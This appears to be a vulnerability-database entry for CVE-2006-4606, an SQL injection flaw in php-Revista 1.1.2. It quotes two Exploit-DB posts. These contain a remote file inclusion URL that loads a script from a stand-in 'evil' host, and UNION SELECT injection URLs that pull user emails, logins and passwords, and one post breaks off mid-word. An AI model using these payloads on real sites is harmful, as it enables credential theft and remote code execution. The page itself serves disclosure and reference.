CVE-2006-4606
published 2006-09-07CVE-2006-4606: Multiple SQL injection vulnerabilities in Longino Jacome php-Revista 1.1.2 allow remote attackers to execute arbitrary SQL commands via the (1) id_temas…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.37%
81.7th percentile
Multiple SQL injection vulnerabilities in Longino Jacome php-Revista 1.1.2 allow remote attackers to execute arbitrary SQL commands via the (1) id_temas parameter in busqueda_tema.php, the (2) cadena parameter in busqueda.php, the (3) id_autor parameter in autor.php, the (4) email parameter in lista.php, and the (5) id_articulo parameter in articulo.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| longino | jacome_php-revista | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PHP-revista 1.1.2 - Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting
exploitdb·2009-04-14
CVE-2006-4608 PHP-revista 1.1.2 - Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting
PHP-revista 1.1.2 - Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting
---
Discovered by Sirdarckcat from elhacker.net
Revista 1.1.2
http://php-revista.sourceforge.org
Revista is a simple spanish PHP magazine editor.
It was done by php.org.mx
It suffers of multiple vulnerabilities.
Remote File Inclusion
http://revista/estilo/[ANY STYLE]/index.php?adodb=http://evil/script
SQLi
http://revista/estilo/[ANY STYLE]/busqueda_tema.php?id_temas=-1+[SQL]
http://revista/estilo/[ANY STYLE]/busqueda.php?cadena='+[SQL]
http://revista/estilo/[ANY STYLE]/autor.php?id_autor=-1+[SQL]
http://revista/estilo/[ANY STYLE]/lista.php?email='+[SQL]
http://revista/estilo/[ANY STYLE]/articulo.php?id_articulo=-1+[SQL]
Credentials Bypass
http://revista/admin/index
Exploit-DB
PHP-revista 1.1.2 - Multiple SQL Injections
exploitdb·2007-03-21
CVE-2006-4606 PHP-revista 1.1.2 - Multiple SQL Injections
PHP-revista 1.1.2 - Multiple SQL Injections
---
php-revista <= 1.1.2 Remote SQL Injection Exploit
Found by & contact : Cold z3ro , [email protected]
script :
http://downloads.sourceforge.net/php-revista/revista-1.1.2.tgz?modtime=1025654400&big_mirror=0
Exploits :
Http://www.Victem.0/revista/estilo/[STYLE]/autor.php?id_autor=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
Http://www.Victem.0/revista/estilo/[STYLE]/articulo.php?id_articulo=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from
autores where id =1 /*
Http://www.Victem.0/revista/estilo/[STYLE]/busqueda.php?cadena='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
Ht
No writeups or analysis indexed.
http://secunia.com/advisories/21738http://securityreason.com/securityalert/1499http://www.attrition.org/pipermail/vim/2009-April/002167.htmlhttp://www.osvdb.org/28445http://www.osvdb.org/28446http://www.osvdb.org/28447http://www.osvdb.org/28448http://www.osvdb.org/28451http://www.osvdb.org/28452http://www.securityfocus.com/archive/1/445007/100/0/threadedhttp://www.securityfocus.com/archive/1/502637/100/0/threadedhttp://www.securityfocus.com/bid/19818http://www.securityfocus.com/bid/23079https://www.exploit-db.com/exploits/3538https://www.exploit-db.com/exploits/8425http://secunia.com/advisories/21738http://securityreason.com/securityalert/1499http://www.attrition.org/pipermail/vim/2009-April/002167.htmlhttp://www.osvdb.org/28445http://www.osvdb.org/28446http://www.osvdb.org/28447http://www.osvdb.org/28448http://www.osvdb.org/28451http://www.osvdb.org/28452http://www.securityfocus.com/archive/1/445007/100/0/threadedhttp://www.securityfocus.com/archive/1/502637/100/0/threadedhttp://www.securityfocus.com/bid/19818http://www.securityfocus.com/bid/23079https://www.exploit-db.com/exploits/3538https://www.exploit-db.com/exploits/8425
2006-09-07
Published